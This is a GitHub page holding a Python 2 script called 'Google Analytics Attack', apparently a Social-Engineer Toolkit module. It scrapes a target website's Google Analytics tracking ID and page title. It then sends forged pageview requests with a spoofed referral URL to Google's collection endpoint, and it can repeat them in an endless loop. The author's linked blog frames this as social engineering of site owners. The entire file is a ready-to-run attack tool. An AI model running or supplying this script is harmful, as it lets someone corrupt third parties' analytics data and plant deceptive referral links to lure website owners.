google-analytics-attack/google_analytics_attack.py at master · ZonkSec/google-analytics-attack · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
#!/usr/bin/env python
print "Loading module. Please wait..."
import src.core.setcore
import sys
import requests
import re
import time
import random

MAIN="Google Analytics Attack by @ZonkSec"
AUTHOR="Tyler Rosonke (@ZonkSec)"

### MAIN ###
def main():
    print_title()
    # determins if auto or manual, then calls functions
    mode_choice = raw_input("[*] Choose mode (automatic/manual): ")
    if mode_choice in ("automatic","auto"):
        print "\n[*] Entering automatic mode.\n"
        url = raw_input("[*] Target website (E.g. 'http://xyz.com/'): ")
        params = auto_params(url)
    elif mode_choice in ("manual","man"):
        print "\n[*] Entering manual mode."
        params = manual_params()
    else:
        print "\n[-] Invalid mode.\n"
        sys.exit()
    # params have been collected, prompts for print
    print "\n[+] Payload ready."
    printchoice = raw_input("\n[*] Print payload?(y/n): ")
    if printchoice == "y":
        print_params(params)

    #sends request
    raw_input("\nPress <enter> to send payload.")
    send_spoof(params)

    #prompts for loop, calls function if need be
    loopchoice = raw_input("\n[*] Send payload on loop?(y/n) ")
    if loopchoice == "y":
        looper(params)
    raw_input("\n\nThis module has finished completing. Press <enter> to continue")

### print_params - loops through params and prints
def print_params(params):
    print
    for entry in params:
        print entry	+ " = " + params[entry]

### looper - prompts for seconds to sleep, starts loop
def looper(params):
    secs = raw_input("[*] Seconds between payload sends: ")
    raw_input("\nSending request every "+secs+" seconds. Use CTRL+C to terminate. Press <enter> to begin loop.")
    while True:
        send_spoof(params)
        time.sleep(int(secs))

### send_spoof - randomizes client id, then sends request to google service
def send_spoof(params):
    params['cid'] = random.randint(100,999)
    r = requests.get('https://www.google-analytics.com/collect', params=params)
    print "\n[+] Payload sent."
    print r.url

### auto_params - makes request to target site, regexes for params
def auto_params(url):
    try: #parses URL for host and page
        m = re.search('(https?:\/\/(.*?))\/(.*)',url)
        host = str(m.group(1))
        page = "/" + str(m.group(3))
    except:
        print "\n[-] Unable to parse URL for host/page. Did you forget an ending '/'?\n"
        sys.exit()
    try: #makes request to target page
        r = requests.get(url)
    except:
        print "\n[-] Unable to reach target website for parsing.\n"
        sys.exit()
    try: #parses target webpage for title
        m = re.search('<title>(.*)<\/title>', r.text)
        page_title = str(m.group(1))
    except:
        print "\n[-] Unable to parse target page for title.\n"
        sys.exit()
    try: #parses target webpage for tracking id
        m = re.search("'(UA-(.*))',", r.text)
        tid = str(m.group(1))
    except:
        print "\n[-] Unable to find TrackingID (UA-XXXXX). Website may not be running Google Anayltics.\n"
        sys.exit()
    #builds params dict
    params = {}
    params['v'] = "1"
    params['tid'] = tid
    params['cid'] = "555"
    params['t'] = "pageview"
    params['dh'] = host
    params['dp'] = page
    params['dt'] = page_title
    params['aip'] = "1"
    params['dr'] = raw_input("\n[*] Enter referral URL to spoof (E.g. 'http://xyz.com/'): ")
    return params

### manual_params - prompts for all params
def manual_params():
    params = {}
    params['v'] = "1"
    params['tid'] = raw_input("\n[*] Enter TrackingID (tid)(UA-XXXXX): ")
    params['cid'] = "555"
    params['t'] = "pageview"
    params['aip'] = "1"
    params['dh'] = raw_input("[*] Enter target host (dh)(E.g. 'http://xyz.xyz)': ")
    params['dp'] = raw_input("[*] Enter target page (dp)(E.g. '/aboutme'): ")
    params['dt'] = raw_input("[*] Enter target page title (dt)(E.g. 'About Me'): ")
    params['dr'] = raw_input("[*] Enter referal page to spoof (dr): ")
    return params

### print_title - prints title and references
def print_title():
    print "\n----------------------------------"
    print "      Google Analytics Attack     "
    print "    By Tyler Rosonke (@ZonkSec)   "
    print "----------------------------------\n"
    print "User-Guide: http://www.zonksec.com/blog/social-engineering-google-analytics/\n"
    print "References:"
    print "-https://developers.google.com/analytics/devguides/collection/protocol/v1/reference"
    print "-https://developers.google.com/analytics/devguides/collection/protocol/v1/parameters\n\n"